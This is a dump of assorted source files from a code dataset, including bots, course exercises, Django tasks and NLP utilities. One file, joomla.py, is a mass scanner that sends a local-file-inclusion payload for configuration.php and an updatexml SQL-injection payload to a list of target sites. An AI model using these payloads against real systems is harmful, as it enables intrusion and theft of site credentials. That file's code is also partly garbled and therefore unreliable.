USER_REFRESH_DAILY_LIMIT-new_count > 0:\n more_text = f\"you have {USER_REFRESH_DAILY_LIMIT-new_count} more refresh(es) today\"\n else:\n more_text = f\"you have no more refreshes today\"\n\n reply_text = f'Data refreshed, {more_text}'\n\n else:\n reply_text = f'Refresh limit of {USER_REFRESH_DAILY_LIMIT} times per day reached, please try again tomorrow'\n else:\n reply_text = 'No airdates user found, nothing to refresh'\n\n except Exception as ex:\n config.logger.error('Something went wrong: ' + str(ex))\n traceback.print_exc()\n reply_text = 'Sorry, something went wrong'\n\n bot.send_message(message.chat.id, reply_text, parse_mode='HTML')\n\n\n @bot.message_handler(commands=['reset'])\n def reset_refresh_count(message):\n try:\n bot_user = BotUser(message.from_user.id, storage_hlp=user_storage_hlp)\n bot_user.reset_refresh_count()\n reply_text = 'Done'\n\n except Exception as ex:\n config.logger.error('Something went wrong: ' + str(ex))\n traceback.print_exc()\n reply_text = 'Sorry, something went wrong'\n\n bot.send_message(message.chat.id, reply_text, parse_mode='HTML')\n\n\n\n @bot.message_handler(commands=['day', 'day_all'])\n def get_calendar(message):\n\n try:\n now = datetime.now()\n chat_id = message.chat.id\n date = (now.year, now.month)\n current_command[chat_id] = message.text\n markup = create_calendar(now.year, now.month)\n bot.send_message(message.chat.id, \"Please, choose a date\", reply_markup=markup)\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n\n @bot.callback_query_handler(func=lambda call: call.data[0:15] == 'calendar-month-')\n def previous_month(call):\n\n try:\n year_month = call.data.split('-')[-1]\n date_obj = datetime.strptime(year_month, '%Y%m')\n markup = create_calendar(date_obj.year, date_obj.month)\n bot.edit_message_text(\"Please, choose a date\", call.from_user.id, call.message.message_id, reply_markup=markup)\n bot.answer_callback_query(call.id, text=\"\")\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n\n @bot.callback_query_handler(func=lambda call: call.data[0:13] == 'calendar-day-')\n def send_shows_day(call):\n\n chat_id = call.message.chat.id\n\n user_only = True\n all_text = ''\n if '_all' in current_command.get(chat_id, ''):\n user_only = False\n all_text = ' ALL'\n\n try:\n day_str = call.data[13:]\n\n bot_user = BotUser(call.from_user.id, storage_hlp=user_storage_hlp)\n shows = tv.get_shows(day_str, bot_user, user_only)\n\n user_text = f'{bot_user.airdates_user}' if bot_user else ''\n reply_text = '{}\\'s ({}){} TV Shows:\\n\\n'.format(user_text, format_date(shows['date']), all_text) \\\n + format_shows_text(shows['episodes'])\n\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id,\n text=reply_text + format_footer(bot_user.airdates_user), parse_mode='HTML')\n bot.answer_callback_query(call.id, text=\"\")\n\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n\n\n @bot.callback_query_handler(func=lambda call: call.data == 'calendar-ignore')\n def ignore_calendar(call):\n\n try:\n bot.answer_callback_query(call.id, text=\"\")\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n\n # should be the last - default, catch all input\n @bot.message_handler(func=lambda m: True)\n def search_shows(message):\n\n try:\n bot_user = BotUser(message.from_user.id, storage_hlp=user_storage_hlp)\n\n if len(message.text.strip()) < 3:\n reply_text = f\"'{message.text}' is too short, please provide at least 3 letters\"\n\n elif message.text.strip() in ['the', 'ing', 'ion', 'tion', 'ers']:\n reply_text = f\"'{message.text}' is too common, please refine the search\"\n\n else:\n episodes = tv.find_episodes_by_text(message.text)\n\n if episodes:\n reply_text = f\"We found the following TV Shows for '{message.text}':\\n\\n\" \\\n + format_shows_text(episodes, True)\n else:\n reply_text = f\"No shows with '{message.text}' in name\"\n\n bot.send_message(message.chat.id, reply_text + format_footer(bot_user.airdates_user), parse_mode='HTML')\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n try:\n # Enable saving next step handlers to file \"./.handlers-saves/step.save\".\n # Delay=2 means that after any change in next step handlers (e.g. calling register_next_step_handler())\n # saving will happen after delay 2 seconds.\n bot.enable_save_next_step_handlers(delay=2, filename=f'{config.data_dir_path}/.handlers-saves/step.save')\n\n # Load next_step_handlers from save file (default \"./.handlers-saves/step.save\")\n # WARNING It will work only if enable_save_next_step_handlers was called!\n bot.load_next_step_handlers(filename=f'{config.data_dir_path}/.handlers-saves/step.save')\n\n except Exception as ex:\n config.logger.error('Cannot load next step handlers: ' + str(ex) + ' Traceback: ' + traceback.format_exc())\n traceback.print_exc()\n\n\n bot.polling(none_stop=True, interval=0)\n\nif __name__ == \"__main__\":\n main()\n\n\n\n\n\n\n\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":23224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"387571552","text":"# 시간초과..\n# O(N^2)의시간이 든다.\ndef solution(a):\n if len(a) >= 3:\n answer = 2\n last = len(a)\n for i in range(1, last-1):\n if a[i] <= min(a[0:i]) or a[i] <= min(a[i+1:last+1]):\n answer += 1\n return answer\n else:\n return len(a)","sub_path":"soohyun/python/programmers/0426/풍선터트리기/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"69164990","text":"from worksnaps_report.celery import app\nfrom celery.decorators import task\nfrom datetime import datetime\nfrom celery.utils.log import get_task_logger\nfrom reports_2.calculation_helper import add_remaining_leaves\n\nfrom django.template import Context\nfrom datetime import datetime,date\n\nfrom reports_2.mailers import send_mails_to_employer, send_mails_to_owner\n\nfrom celery.task.schedules import crontab\nfrom celery.decorators import periodic_task\n\nlogger = get_task_logger(__name__)\n\n@task(name=\"reports_2.update_employee_leaves\")\ndef get_day_data():\n\ttry:\n\t\ttoday_ist = datetime.now()\n\t\tadd_remaining_leaves(\n\t\tfrom_date=0,to_date=0,year=str(today_ist.year),month=str(today_ist.month),user_name='all')\n\texcept Exception as e:\n\t\tlogger.error(e,exc_info=True)\n\n@task(name=\"reports_2.send_employee_request_mail\")\ndef send_requests_email_to_employer(data, from_email, username):\n\t\"\"\"\n\t\tSend email to employer when employee request a leave\n\t\tAsync.\n\t\"\"\"\n\ttry:\n\t\tsubject = \"S7works leave request from {}\"\n\t\ttemplate_directory = 'email/requests.html'\n\t\t\n\t\tsend_mails_to_employer(\n\t\t\tsubject, \n\t\t\ttemplate_directory, \n\t\t\tfrom_email=from_email, \n\t\t\tusername=username, \n\t\t\tdata=data\n\t\t)\n\t\t\n\texcept Exception as e:\n\t\tlogger.error(e, exc_info=True)\n\n\n\n@task(name = 'report_2.email_daily_report_status')\ndef send_daily_report_count():\n\n\t\"\"\"\n\t\tSend email to the owner at 00:15 of previous days daily report's count\n\t\"\"\"\n\n\tprint(\"daily report count email started\")\n\n\ttry:\n\t\ttemplate_directory = 'email/dailyReportCount.html'\n\n\t\tsend_mails_to_owner(template_directory)\n\n\texcept Exception as e:\n\t\tlogger.error(e, exc_info=True)\n\n \n\n\n\n\n\n","sub_path":"reports_2/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"291492770","text":"import json\nimport logging\nimport re\n\nfrom api.api_samples.python_client.api_client import CloudBoltAPIClient\nfrom api.api_samples.python_client.samples.api_helpers import wait_for_order_completion\nfrom common.methods import set_progress\nfrom servicecatalog.models import ServiceBlueprint\nfrom utilities.exceptions import CloudBoltException\nfrom utilities.models import ConnectionInfo\n\n\n# suppress logging from requests module\nlogger = logging.getLogger('requests')\nlogger.setLevel(40)\nlogger = logging.getLogger('py.warnings')\nlogger.setLevel(40)\n\nAPI_CLIENT_CI = \"CIT API Client\"\n\n# BP specific variables - You should change these\nBLUEPRINT = 73\n\nBP_PAYLOAD = \"\"\"\n{\n \"group\": \"/api/v2/groups/2/\",\n \"items\": {\n \"deploy-items\": [\n {\n \"blueprint\": \"/api/v2/blueprints/85/\",\n \"blueprint-items-arguments\": {\n \"build-item-create EKS stack\": {\n \"parameters\": {\n \"cluster-name-a391\": \"test_alpha1\",\n \"cluster-security-group-a391\": \"sg-0092921b8fa25afdd\",\n \"env-id-a391\": \"4\",\n \"key-name-a391\": \"a\",\n \"node-group-name-a391\": \"cit-test-stack\",\n \"node-image-id-a391\": \"ami-08c4955bcc43b124e\",\n \"node-instance-type-a391\": \"t2.small\",\n \"node-volume-size-a391\": \"5\",\n \"scaling-desired-capacity-a391\": \"2\",\n \"scaling-max-size-a391\": \"2\",\n \"scaling-min-size-a391\": \"1\",\n \"stack-name-a391\": \"cit-test-stack\",\n \"subnets-a391\": [\n \"subnet-3bda5d5c\",\n \"subnet-43431409\"\n ]\n }\n }\n },\n \"resource-name\": \"Amazon EKS Stack\",\n \"resource-parameters\": {}\n }\n ]\n },\n \"submit-now\": \"true\"\n}\n\"\"\"\n\nNEW_RESOURCE_NAME = \"cit-test-stack\"\n# END of BP specific variables\n\n\ndef get_order_id_from_href(order_href):\n mo = re.search(\"/orders/([0-9]+)\", order_href)\n return int(mo.groups()[0])\n\n\ndef test_order_blueprint(client):\n order = json.loads(client.post('/api/v2/orders/', body=BP_PAYLOAD))\n order_href = order['_links']['self']['href']\n order_id = get_order_id_from_href(order_href)\n result = wait_for_order_completion(client, order_id, 720, 10)\n if result != 0:\n raise CloudBoltException(\n \"Blueprint Deployment order {} did not succeed.\".format(order_id))\n set_progress(\n \"Blueprint deployment order {} completed successfully.\".format(order_id))\n\n\ndef test_delete_resource(client, resource):\n body = \"{}\"\n delete = json.loads(client.post(\n '/api/v2/resources/{}/{}/actions/1/'.format(resource.resource_type.name, resource.id), body=body))\n\n\ndef get_api_client():\n ci = ConnectionInfo.objects.get(name=API_CLIENT_CI)\n return CloudBoltAPIClient(\n ci.username, ci.password, ci.ip, ci.port, protocol=ci.protocol)\n\n\ndef run(job, *args, **kwargs):\n bp = ServiceBlueprint.objects.get(id=BLUEPRINT)\n set_progress(\n \"Running Continuous Infrastructure Test for blueprint {}\".format(bp)\n )\n\n client = get_api_client()\n\n # Order the BP\n set_progress(\"### ORDERING BLUEPRINT ###\", tasks_done=0, total_tasks=3)\n test_order_blueprint(client)\n\n \n resource = bp.resource_set.get(name=NEW_RESOURCE_NAME, lifecycle='ACTIVE')\n ''' we don't have sync functionality \n # Delete the resource from the database only\n resource.delete()\n set_progress(\"### DISCOVERING RESOURCES FOR BLUEPRINT ###\", tasks_done=1)\n bp.sync_resources()\n\n # should be able to get the resource since the sync should have created it\n resource = bp.resource_set.get(\n name__icontains=NEW_RESOURCE_NAME, lifecycle='ACTIVE')\n '''\n set_progress(\"### DELETING RESOURCE FOR BLUEPRINT ###\", tasks_done=2)\n test_delete_resource(client, resource)\n\n set_progress(\"ALL Tests completed!\", tasks_done=3)\n","sub_path":"blueprints/eks-stack/cit/test-stack.py","file_name":"test-stack.py","file_ext":"py","file_size_in_byte":4209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"542061539","text":"import sys\nimport json\nimport requests\n\n\n\nurls = open('url.txt')\n\npoc = '/index.php/api/Uploadify/preview'\n\n\n\nfor i in urls:\n url = i.rstrip(\"\\n\")\n #本地文件���含\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50\"\n }\n payload = \"/components/com_docman/dl2.php?archive=0&file=Li4vY29uZmlndXJhdGlvbi5waHA=\"\n vulnurl = url + payload\n try:\n req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)\n if req.status_code == 200 and r\"可能不存在漏洞\", \"cyan\")\n #SQL注入\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50\"\n }\n payload = \"/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,Md5(1234)),0)\"\n vulnurl = url + payload\n try:\n req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)\n if r\"81dc9bdb52d04dc20036dbd8313ed05\" in req.text:\n print(\"[+]存在joomla 3.7.0 core SQL注入漏洞...(高危)\\tpayload: \" + vulnurl, \"red\")\n with open('SQL注入.txt', 'a')as f:\n f.write(str(vulnurl) + '\\n')\n else:\n print(\"[-]不存在joomla_index_list_sqli漏洞\", \"white\", \"on_grey\")\n\n except:\n print(\"[-] \" + __file__ + \"====>可能不存在漏洞\", \"cyan\")\n\n","sub_path":"joomla/joomla.py","file_name":"joomla.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"548571714","text":"file = \"/mnt/Data/Datasets/Wiktionary/ukwiktionary-20190101-pages-articles.xml\"\nbigfile = \"/mnt/Data/Datasets/Wiktionary/enwiktionary-latest-pages-articles.xml\"\n# out_folder = \"/mnt/Data/Datasets/Wiktionary/\"\n\nlanguage_filtering_templates = {\"uk\":[\"[Category:Українськ\",\n \"[Категорія:Українськ\"]}\n\ndef filter_by_language_templates(language, language_filtering_templates,\n location_index, xml_dump):\n templates = language_filtering_templates[language]\n filtered_index = {}\n for item in location_index:\n entry = retrieve_by_index(item, location_index)\n for template in templates:\n if template in entry:\n filtered_index[item] = location_index[item]\n break\n\n return filtered_index\n\n\n\n\n# the first num is the offset from beginning of the file,\n# and the second is the length of the article\nlocations_index = {\"cat\":[3000500000, 15]}\n\ndef retrieve_by_index(word, locations_index):\n try:\n locations = locations_index[word]\n except KeyError:\n print(\"The word '\"+word+\"' was not found in the index.\")\n return None\n f = open(file, 'rb')\n f.seek(locations[0], 0) # move the file pointer forward 6 bytes (i.e. to the 'w')\n article = f.read(locations[1]) # read the rest of the article\n # from the pointer\n f.close()\n return article.decode(\"utf-8\")\n\nlocations_index = {'навігатор': [331487, 2639]}\n\n# print(retrieve_by_index('навігатор', locations_index))\n\ndef build_index(xml_dump):\n\n locations_index = []\n\n fh = open(xml_dump, \"r\")\n\n def get_word_position(start_position):\n while True:\n row = fh.readline()\n if \"\" in row:\n start = fh.tell()\n if \"\" in row:\n word = row.strip()\n word = word.strip(\"<title>\")\n word = word.strip(\"\")\n if \"\" in row:\n end = fh.tell()\n length = end-start\n locations_index.append([word, start, length, end])\n return None\n if \"\" in row:\n locations_index.append(None)\n return None\n\n # get the first article starting at position 0\n get_word_position(0)\n\n #get the rest of the articles\n while True:\n if isinstance(locations_index[-1], list):\n get_word_position(locations_index[-1][-1])\n else:\n break\n locations_index = locations_index[:-1]\n fh.close()\n\n # save the results\n outpath = file.replace(\".xml\", \".yaml\")\n with open(outpath, \"w\") as out:\n for l in locations_index:\n # get rid of \"category: whatever type pages\"\n if not \":\" in l[0]:\n out.write(l[0]+\": [\"+str(l[1])+\", \"+str(l[2])+\"]\\n\")\n # return locations_index\n\n #format the output as dictionary\n\n# test = retrieve_by_index(\"cat\", locations_index)\n# print(test)\nbuild_index(xml_dump=file)\n","sub_path":"utils/offline.py","file_name":"offline.py","file_ext":"py","file_size_in_byte":3061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"407569682","text":"from typing import List, Iterator\nfrom overrides import overrides\nfrom allennlp.common.util import JsonDict, sanitize\nimport json\nfrom allennlp.data import DatasetReader, Instance\nfrom allennlp.data.dataset_readers import MultiprocessDatasetReader\nfrom allennlp.predictors.predictor import Predictor\nfrom allennlp.models import Model\nimport numpy as np\nimport torch\n\n\ndef order2chain(order):\n chain = []\n for s_idx, o in enumerate(order):\n o = int(o)\n if o >= 0:\n if o >= len(chain):\n chain += [-1]*(o+1-len(chain))\n chain[o] = s_idx\n if not all([i >= 0 for i in chain]):\n print(\"order:\", order)\n print(\"chain:\", chain)\n #exit()\n pos = None\n for i, c in enumerate(chain):\n if c < 0:\n pos = i\n chain = chain[:pos]\n return chain\n\n\n@Predictor.register('hotpot_bert_chainex_predictor')\nclass HotpotPredictor(Predictor):\n @overrides\n def _json_to_instance(self, hotpot_dict_instance: JsonDict) -> Instance:\n print(type(hotpot_dict_instance), len(hotpot_dict_instance))\n if type(self._dataset_reader) == MultiprocessDatasetReader:\n processed_instance = self._dataset_reader.reader.process_raw_instance(hotpot_dict_instance)\n else:\n processed_instance = self._dataset_reader.process_raw_instance(hotpot_dict_instance)\n instance = self._dataset_reader.text_to_instance(*processed_instance)\n return instance\n\n def process_output(self, output: JsonDict) -> JsonDict:\n pred_sent_orders = output.get('pred_sent_orders', None)\n num_sents = len(output['sent_labels']) # for removing padding\n if not pred_sent_orders is None:\n pred_chains = [order2chain(order) for order in pred_sent_orders]\n pred_chains = [ch for ch in pred_chains if all(c < num_sents for c in ch)]\n assert len(pred_chains) > 0, repr([order2chain(order) for order in pred_sent_orders]) + '\\n' + 'num sents: %d' % num_sents + '\\n%s' % output['_id']\n else:\n # get pred evdiences from sentences with top k ``gate_prob``\n gate_probs = output['gate_probs'][:num_sents]\n pred_chains = [[i] for i in sorted(range(num_sents), key=lambda x: gate_probs[x], reverse=True)[:10]]\n return {#'answer_texts': output['answer_texts'],\n #'best_span_str': output.get('best_span_str', None),\n #'best_span': output.get('best_span', None),\n 'pred_sent_labels': output.get('pred_sent_labels', None),\n 'pred_sent_orders': output.get('pred_sent_orders', None),\n 'pred_chains': pred_chains,\n 'possible_chain': output.get('evd_possible_chains', None),\n 'question_tokens': output['question_tokens'],\n 'passage_sent_tokens': output['passage_sent_tokens'],\n #'token_spans_sp': output['token_spans_sp'],\n #'token_spans_sent': output['token_spans_sent'],\n 'sent_labels': output['sent_labels'],\n 'ans_sent_idxs': output.get('ans_sent_idxs', None),\n '_id': output['_id']}\n\n @overrides\n def predict_instance(self, instance: Instance) -> JsonDict:\n outputs = self._model.forward_on_instance(instance)\n outputs = sanitize(outputs)\n return self.process_output(outputs)\n\n @overrides\n def predict_batch_instance(self, instances: List[Instance]) -> List[JsonDict]:\n outputs = self._model.forward_on_instances(instances)\n outputs = sanitize(outputs)\n return [self.process_output(o) for o in outputs]\n\n def predict(self, hotpot_dict_instance: JsonDict) -> JsonDict:\n \"\"\"\n Expects JSON that has the same format of instances in Hotpot dataset\n \"\"\"\n return self.predict_json(hotpot_dict_instance)\n","sub_path":"my_library/predictors/hotpot_bert_chainex_predictor.py","file_name":"hotpot_bert_chainex_predictor.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"504503122","text":"import requests\n\nfrom ecdsa import SigningKey, VerifyingKey, NIST256p\nfrom ace.edhoc import Client as EdhocClient\n\n\nclass AceSession:\n\n session_id = 0\n\n def __init__(self, session_id, private_pop_key, public_pop_key, pop_key_id: bytes):\n self.session_id = session_id\n self.private_pop_key = private_pop_key\n self.public_pop_key = public_pop_key\n self.pop_key_id = pop_key_id\n self.token = None\n self.rs_url = None\n self.edhoc_client = EdhocClient(self.private_pop_key,\n None,\n kid=self.pop_key_id)\n self.oscore_context = None\n\n # @property\n # def oscore_context(self):\n # return self.edhoc_client.session.oscore_context\n\n @property\n def rs_public_key(self):\n return self.edhoc_client.server_id\n\n @rs_public_key.setter\n def rs_public_key(self, value):\n self.edhoc_client.server_id = value\n\n @classmethod\n def create(cls, key_id: bytes):\n (prv_key, pub_key) = AceSession.generate_session_key()\n\n session_id = AceSession.session_id\n AceSession.session_id += 1\n\n return AceSession(session_id=session_id,\n private_pop_key=prv_key,\n public_pop_key=pub_key,\n pop_key_id=key_id)\n\n @staticmethod\n def generate_session_key():\n \"\"\"\n Generates an asymmetric session key\n :return: (private_key, public_key) pair\n \"\"\"\n\n private_key = SigningKey.generate(curve=NIST256p)\n public_key = private_key.get_verifying_key()\n\n return private_key, public_key\n","sub_path":"ace/client/ace_session.py","file_name":"ace_session.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"57774257","text":"\"\"\"\nDay 24: More Linked Lists \n\nhttps://www.hackerrank.com/challenges/30-linked-list-deletion\n\"\"\"\nimport unittest\nimport contextlib\nfrom io import StringIO\n\n\nclass Node(object):\n def __init__(self, data):\n self.data = data\n self.next = None\n\n\nclass Solution(object):\n def insert(self, head, data):\n p = Node(data)\n if head == None:\n head = p\n elif head.next == None:\n head.next = p\n else:\n start = head\n while (start.next != None):\n start = start.next\n start.next = p\n\n return head\n\n def display(self, head):\n current = head\n while current:\n print(current.data, end=' ')\n current = current.next\n\n def removeDuplicates(self, head):\n node = head\n while node is not None:\n if node.next is None:\n break\n else:\n if node.data == node.next.data:\n node.next = node.next.next\n else:\n node = node.next\n\n return head\n\n\nif __name__ == '__main__':\n mylist = Solution()\n T = int(input())\n head = None\n for i in range(T):\n data = int(input())\n head = mylist.insert(head, data)\n head = mylist.removeDuplicates(head)\n mylist.display(head)\n\n\nclass TestLinkedList(unittest.TestCase):\n def test_remove_duplicates(self):\n mylist = Solution()\n head = None\n\n for item in [1, 2, 2, 3, 3, 4]:\n head = mylist.insert(head, item)\n\n head = mylist.removeDuplicates(head)\n\n out = StringIO()\n with contextlib.redirect_stdout(out):\n mylist.display(head)\n\n self.assertEqual(\n \"1 2 3 4\",\n out.getvalue().strip()\n )\n","sub_path":"day_24_more_linked_list.py","file_name":"day_24_more_linked_list.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"91586126","text":"# credits to @mrconfused dont edit credits\n\nimport asyncio\nfrom datetime import datetime\n\nfrom telethon.errors import BadRequestError\nfrom telethon.tl.functions.channels import EditBannedRequest\nfrom telethon.tl.types import ChatBannedRights, MessageEntityMentionName\n\nimport sql_helpers.gban_sql_helper as gban_sql\nfrom uniborg import MODULE, SYNTAX\nfrom uniborg.util import admin_cmd\nfrom userbot import PEPE_ID, admin_groups\n\nMODULE.append(\"gban\")\n\nBANNED_RIGHTS = ChatBannedRights(\n until_date=None,\n view_messages=True,\n send_messages=True,\n send_media=True,\n send_stickers=True,\n send_gifs=True,\n send_games=True,\n send_inline=True,\n embed_links=True,\n)\n\nUNBAN_RIGHTS = ChatBannedRights(\n until_date=None,\n send_messages=None,\n send_media=None,\n send_stickers=None,\n send_gifs=None,\n send_games=None,\n send_inline=None,\n embed_links=None,\n)\n\nif Config.BOTLOG is None:\n BOTLOG = False\nelse:\n BOTLOG = True\n BOTLOG_CHATID = Config.BOTLOG\n\n\n@borg.on(admin_cmd(pattern=\"gban(?: |$)(.*)\"))\nasync def catgban(cat):\n await cat.edit(\"`Gbaning this gey...`\")\n start = datetime.now()\n user, reason = await get_user_from_event(cat)\n if not user:\n return\n if user.id == (await cat.client.get_me()).id:\n await cat.edit(\"`Why would i ban myself.. KEK`\")\n return\n if user.id in PEPE_ID:\n await cat.edit(\"`Why would I ban my DEVELOPER.. LMAO`\")\n return\n if gban_sql.is_gbanned(user.id):\n await cat.edit(\n f\"The [user](tg://user?id={user.id}) is already in Gbanned list any way checking again\"\n )\n else:\n gban_sql.catgban(user.id, reason)\n san = []\n san = await admin_groups(cat)\n count = 0\n sandy = len(san)\n if sandy == 0:\n await cat.edit(\"`You are not admin of atleast one group.. USELESS`\")\n return\n await cat.edit(\n f\"`Initiating Gban of the` [User](tg://user?id={user.id}) `in {len(san)}` groups\"\n )\n for i in range(sandy):\n try:\n await cat.client(EditBannedRequest(san[i], user.id, BANNED_RIGHTS))\n await asyncio.sleep(0.5)\n count += 1\n except BadRequestError:\n await borg.send_message(\n BOTLOG_CHATID,\n f\"You don't have required permission in :\\nCHAT: {cat.chat.title}(`{cat.chat_id}`)\\nFor baning here\",\n )\n try:\n reply = await cat.get_reply_message()\n if reply:\n await reply.delete()\n except BadRequestError:\n await cat.edit(\n \"`I dont have message deleting rights here! But still he was gbanned!`\"\n )\n end = datetime.now()\n cattaken = (end - start).seconds\n if reason:\n await cat.edit(\n f\"[{user.first_name}](tg://user?id={user.id}) was gbanned in `{count}` groups in `{cattaken} seconds`!!\\nReason: `{reason}`\"\n )\n else:\n await cat.edit(\n f\"[{user.first_name}](tg://user?id={user.id}) was gbanned in `{count}` groups in `{cattaken} seconds`!!\"\n )\n\n if BOTLOG and count != 0:\n await borg.send_message(\n BOTLOG_CHATID,\n f\"#GBAN\\nGlobal BAN\\nUser: [{user.first_name}](tg://user?id={user.id})\\nID: `{user.id}`\\\n \\nReason: `{reason}`\\nBanned in `{count}` groups\\nTime taken = `{cattaken} seconds`\",\n )\n\n\n@borg.on(admin_cmd(pattern=\"ungban(?: |$)(.*)\"))\nasync def catgban(cat):\n await cat.edit(\"`Ungbaning this Nibba...`\")\n start = datetime.now()\n user, reason = await get_user_from_event(cat)\n if not user:\n return\n if gban_sql.is_gbanned(user.id):\n gban_sql.catungban(user.id)\n else:\n await cat.edit(\n f\"The [user](tg://user?id={user.id}) is not in your gbanned list\"\n )\n return\n san = []\n san = await admin_groups(cat)\n count = 0\n sandy = len(san)\n if sandy == 0:\n await cat.edit(\"you are not admin of atleast one group \")\n return\n await cat.edit(\n f\"`Initiating Ungban of the` [user](tg://user?id={user.id}) `in {len(san)} groups`\"\n )\n for i in range(sandy):\n try:\n await cat.client(EditBannedRequest(san[i], user.id, UNBAN_RIGHTS))\n await asyncio.sleep(0.5)\n count += 1\n except BadRequestError:\n await borg.send_message(\n BOTLOG_CHATID,\n f\"You don't have required permission in :\\nCHAT: {cat.chat.title}(`{cat.chat_id}`)\\nFor unbaning here\",\n )\n end = datetime.now()\n cattaken = (end - start).seconds\n if reason:\n await cat.edit(\n f\"[{user.first_name}](tg://user?id={user.id}) was ungbanned in `{count}` groups in `{cattaken} seconds`!!\\nReason: `{reason}`\"\n )\n else:\n await cat.edit(\n f\"[{user.first_name}](tg://user?id={user.id}) was ungbanned in `{count}` groups in `{cattaken} seconds`!!\"\n )\n\n if BOTLOG and count != 0:\n await borg.send_message(\n BOTLOG_CHATID,\n f\"#UNGBAN\\nGlobal UNBAN\\nUser: [{user.first_name}](tg://user?id={user.id})\\nID: {user.id}\\\n \\nReason: `{reason}`\\nUnbanned in `{count}` groups\\nTime taken = `{cattaken} seconds`\",\n )\n\n\n@borg.on(admin_cmd(pattern=\"listgban$\"))\nasync def gablist(event):\n if event.fwd_from:\n return\n gbanned_users = gban_sql.get_all_gbanned()\n GBANNED_LIST = \"**Current Gbanned Users**\\n\\n\"\n if len(gbanned_users) > 0:\n for a_user in gbanned_users:\n if a_user.reason:\n GBANNED_LIST += f\"👉 [{a_user.chat_id}](tg://user?id={a_user.chat_id}) for {a_user.reason}\\n\"\n else:\n GBANNED_LIST += (\n f\"👉 [{a_user.chat_id}](tg://user?id={a_user.chat_id}) Reason None\\n\"\n )\n else:\n GBANNED_LIST = \"`No Gbanned Users` **(yet)**\"\n if len(GBANNED_LIST) > 4095:\n with io.BytesIO(str.encode(GBANNED_LIST)) as out_file:\n out_file.name = \"Gbannedusers.txt\"\n await event.client.send_file(\n event.chat_id,\n out_file,\n force_document=True,\n allow_cache=False,\n caption=\"Current Gbanned Users\",\n reply_to=event,\n )\n await event.delete()\n else:\n await event.edit(GBANNED_LIST)\n\n\nasync def get_user_from_event(event):\n \"\"\"Get the user from argument or replied message.\"\"\"\n args = event.pattern_match.group(1).split(\" \", 1)\n extra = None\n if event.reply_to_msg_id:\n previous_message = await event.get_reply_message()\n user_obj = await event.client.get_entity(previous_message.sender_id)\n extra = event.pattern_match.group(1)\n elif args:\n user = args[0]\n if len(args) == 2:\n extra = args[1]\n if user.isnumeric():\n user = int(user)\n if not user:\n await event.edit(\"`Pass the user's username, id or reply!`\")\n return\n if event.message.entities:\n probable_user_mention_entity = event.message.entities[0]\n\n if isinstance(probable_user_mention_entity, MessageEntityMentionName):\n user_id = probable_user_mention_entity.user_id\n user_obj = await event.client.get_entity(user_id)\n return user_obj\n try:\n user_obj = await event.client.get_entity(user)\n except (TypeError, ValueError):\n await event.edit(\"Could not fetch info of that user.\")\n return None\n return user_obj, extra\n\n\nSYNTAX.update(\n {\n \"gadmin\": \".gban \\\n\\n**Usage : **Bans the person in all groups where you are admin .\\\n\\n\\n.ungban \\\n\\n**Usage : **Reply someone's message with .ungban to remove them from the gbanned list.\\\n\\n\\n.listgban\\\n\\n**Usage : **Shows you the gbanned list and reason for their gban.\\\n\\n\\n.gmute \\\n\\n**Usage : **Mutes the person in all groups you have in common with them.\\\n\\n\\n.ungmute \\\n\\n**Usage : **Reply someone's message with .ungmute to remove them from the gmuted list.\"\n }\n)\n","sub_path":"dbplugins/gban.py","file_name":"gban.py","file_ext":"py","file_size_in_byte":8284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"136537341","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: d:\\users\\ma_k\\appdata\\local\\temp\\pip-build-s8wja0\\httplog\\httplog\\migrations\\0001_initial.py\n# Compiled at: 2016-11-28 21:21:16\nfrom __future__ import unicode_literals\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion, jsonfield.fields\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL)]\n operations = [\n migrations.CreateModel(name=b'HttpLog', fields=[\n (\n b'id', models.AutoField(auto_created=True, primary_key=True, 